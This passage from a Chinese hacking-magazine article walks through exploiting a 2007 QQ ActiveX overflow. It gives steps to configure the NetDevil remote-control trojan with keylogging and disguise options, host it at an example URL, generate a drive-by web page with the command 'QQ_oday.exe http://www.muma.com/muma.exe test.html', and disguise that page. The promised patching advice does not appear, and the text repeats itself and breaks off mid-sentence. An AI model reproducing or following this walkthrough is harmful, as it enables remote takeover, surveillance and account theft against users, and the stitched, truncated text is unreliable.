论文部分内容阅读
通过本文你可以学到
QQ漏洞的危害
如何利用QQ漏洞制作网页木马
修补QQ漏洞的简单方法
2007年年初,一向吸引人眼球的腾讯QQ,悄悄公布了最新的QQ补丁。不起眼的行为后面,隐藏的是一条大新闻——包括QQ2006正式版在内的所有QQ版本,都存在着一个溢出漏洞,任何安装了QQ聊天软件的用户,都有可能遭受攻击,被恶意攻击者远程控制电脑!QQ用户可就有2亿,这可不是一个小数目,如果众多的QQ用户电脑上都存在此漏洞,想一想,一场大规模的攻击入侵很可能就此展开!——为了让《红客路线》栏目的读者们第一时间认识这个最新的入侵漏洞,深入了解此漏洞的危害并进行防范,我们下面就为大家揭密最新的QQ漏洞入侵利用过程……
一、了解QQ漏洞
在QQ2006正式版及之前所有版本中存在着几个Oday漏洞,均是由于Activex Control造成的。在QQ中相关的漏洞DLL文件分别是:VQQPlayer.ocx.VQQsdl.dllV2MailActiveX.ocx。特别是在VQQPlayer.ocx中,存在一个栈溢出漏洞,成功利用此漏洞可以控制漏洞主机的系统System权限。另外几个漏洞均是拒绝服务漏洞,可能造成远程主机崩溃死机。
由于这几个漏洞文件是采用Activex插件形式安装在系统中的,因此只要用户安装过QQ,甚至无需运行或登录QQ,都可能遭受远程攻击,被攻击者远程控制。
二、漏洞利用过程
现在我们来详细了解一下攻击者是如何利用此漏洞进行攻击的:
步骤一:制作木马
首先,攻击者会准备一个用于攻击的木马,可能是远程控制木马,也可能是盗QQ和各种游戏帐号的盗号木马,这里使用的是“NetDevil V1.5”国外远程控制木马进行演示。
小提示
NetDevil V1.5是一款非常强大的DLL注入式反弹木马,运行时非常隐藏,可进行远程文件管理、桌面视频监控、键盘记录等。
下载解压NetDevil V1.5,运行其中的服务端修改器“Edit-server,exe”,点击“打开”按钮,浏览指定当前文件夹下的“server.exe”木马服务端文件。在“general”中可设置木马安装后的DLL文件名,以及远程连接、键盘记录等端口。在“Fake error”项中,可以设置木马运行时的伪装错误提示;在“icon”项中,可设置木马服务端图标。设置完毕后,点击“save”按钮,即可保存木马设置。
步骤二:上传木马
在当前文件夹下生成木马文件“server.exe”,将木马上传到网站上,假设木马地址为:“http://www.muma.com/muma.exe”,
步骤三利用QQ漏洞制作网页木马
下载解压“QQ远程溢出漏洞最新利用工具”,在命令提示符窗口下进入该文件夹,执行命令:“QQ_oday.exe”,可查看到该工具格式为:
QQ_oday.exe 木马连接地址生成的html网页文件名
我们可利用该漏洞生成一个网页木马,执行命令:
QQ_oday.exe http://www.muma.com/muma.exe test.html
命令执行后,即可在当前目录下生成一个名为“test.htm”的网页木马文件。
步骤四:修改伪装网页木马
生成的“test.html”网页木马文件,已经是一个完整的网页文件了,可将其上传到网站上,当其他人访问此网页时就会中招。不过该网页文件是一个空白的网页,因此很容易被别人察觉,我们可对其进行伪装。
用记事本打开“test.html”网页文件,在其中可看到连接的“”和“
QQ漏洞的危害
如何利用QQ漏洞制作网页木马
修补QQ漏洞的简单方法
2007年年初,一向吸引人眼球的腾讯QQ,悄悄公布了最新的QQ补丁。不起眼的行为后面,隐藏的是一条大新闻——包括QQ2006正式版在内的所有QQ版本,都存在着一个溢出漏洞,任何安装了QQ聊天软件的用户,都有可能遭受攻击,被恶意攻击者远程控制电脑!QQ用户可就有2亿,这可不是一个小数目,如果众多的QQ用户电脑上都存在此漏洞,想一想,一场大规模的攻击入侵很可能就此展开!——为了让《红客路线》栏目的读者们第一时间认识这个最新的入侵漏洞,深入了解此漏洞的危害并进行防范,我们下面就为大家揭密最新的QQ漏洞入侵利用过程……
一、了解QQ漏洞
在QQ2006正式版及之前所有版本中存在着几个Oday漏洞,均是由于Activex Control造成的。在QQ中相关的漏洞DLL文件分别是:VQQPlayer.ocx.VQQsdl.dllV2MailActiveX.ocx。特别是在VQQPlayer.ocx中,存在一个栈溢出漏洞,成功利用此漏洞可以控制漏洞主机的系统System权限。另外几个漏洞均是拒绝服务漏洞,可能造成远程主机崩溃死机。
由于这几个漏洞文件是采用Activex插件形式安装在系统中的,因此只要用户安装过QQ,甚至无需运行或登录QQ,都可能遭受远程攻击,被攻击者远程控制。
二、漏洞利用过程
现在我们来详细了解一下攻击者是如何利用此漏洞进行攻击的:
步骤一:制作木马
首先,攻击者会准备一个用于攻击的木马,可能是远程控制木马,也可能是盗QQ和各种游戏帐号的盗号木马,这里使用的是“NetDevil V1.5”国外远程控制木马进行演示。
小提示
NetDevil V1.5是一款非常强大的DLL注入式反弹木马,运行时非常隐藏,可进行远程文件管理、桌面视频监控、键盘记录等。
下载解压NetDevil V1.5,运行其中的服务端修改器“Edit-server,exe”,点击“打开”按钮,浏览指定当前文件夹下的“server.exe”木马服务端文件。在“general”中可设置木马安装后的DLL文件名,以及远程连接、键盘记录等端口。在“Fake error”项中,可以设置木马运行时的伪装错误提示;在“icon”项中,可设置木马服务端图标。设置完毕后,点击“save”按钮,即可保存木马设置。
步骤二:上传木马
在当前文件夹下生成木马文件“server.exe”,将木马上传到网站上,假设木马地址为:“http://www.muma.com/muma.exe”,
步骤三利用QQ漏洞制作网页木马
下载解压“QQ远程溢出漏洞最新利用工具”,在命令提示符窗口下进入该文件夹,执行命令:“QQ_oday.exe”,可查看到该工具格式为:
QQ_oday.exe 木马连接地址生成的html网页文件名
我们可利用该漏洞生成一个网页木马,执行命令:
QQ_oday.exe http://www.muma.com/muma.exe test.html
命令执行后,即可在当前目录下生成一个名为“test.htm”的网页木马文件。
步骤四:修改伪装网页木马
生成的“test.html”网页木马文件,已经是一个完整的网页文件了,可将其上传到网站上,当其他人访问此网页时就会中招。不过该网页文件是一个空白的网页,因此很容易被别人察觉,我们可对其进行伪装。
用记事本打开“test.html”网页文件,在其中可看到连接的“